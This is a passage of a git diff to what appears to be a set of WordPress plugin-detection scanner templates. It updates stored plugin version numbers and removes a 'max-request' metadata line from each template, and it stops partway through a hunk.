1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 210 files changed, 10 insertions(+), 210 deletions(-) diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt index 711ee4f504..b532f3dc33 100644 --- a/helpers/wordpress/plugins/cookie-law-info.txt +++ b/helpers/wordpress/plugins/cookie-law-info.txt @@ -1 +1 @@ -3.1.3 \ No newline at end of file +3.1.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index 64f9b497e2..41fd4c1f54 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.15.3 \ No newline at end of file +3.16.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/formidable.txt b/helpers/wordpress/plugins/formidable.txt index 04757a5d3c..69c93913e4 100644 --- a/helpers/wordpress/plugins/formidable.txt +++ b/helpers/wordpress/plugins/formidable.txt @@ -1 +1 @@ -6.4.2 \ No newline at end of file +6.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/leadin.txt b/helpers/wordpress/plugins/leadin.txt index 8d22a71d88..0fc9c3b704 100644 --- a/helpers/wordpress/plugins/leadin.txt +++ b/helpers/wordpress/plugins/leadin.txt @@ -1 +1 @@ -10.2.3 \ No newline at end of file +10.2.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 2700fff004..238cd7ab79 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.26.1 \ No newline at end of file +4.27.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pinterest-for-woocommerce.txt b/helpers/wordpress/plugins/pinterest-for-woocommerce.txt index 2fe9589453..7c2791e8ee 100644 --- a/helpers/wordpress/plugins/pinterest-for-woocommerce.txt +++ b/helpers/wordpress/plugins/pinterest-for-woocommerce.txt @@ -1 +1 @@ -1.3.9 \ No newline at end of file +1.3.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index aacbdd578d..914ec96711 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.5.9.4 \ No newline at end of file +2.6.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-cachepress.txt b/helpers/wordpress/plugins/sg-cachepress.txt index b616717999..6b0e58e78f 100644 --- a/helpers/wordpress/plugins/sg-cachepress.txt +++ b/helpers/wordpress/plugins/sg-cachepress.txt @@ -1 +1 @@ -7.4.0 \ No newline at end of file +7.4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt index 24afbc91d3..da15618101 100644 --- a/helpers/wordpress/plugins/woocommerce.txt +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -1 +1 @@ -8.0.3 \ No newline at end of file +8.1.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt index 31235d1a58..1ce954a083 100644 --- a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt +++ b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt @@ -1 +1 @@ -10.6.1 \ No newline at end of file +10.7 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ 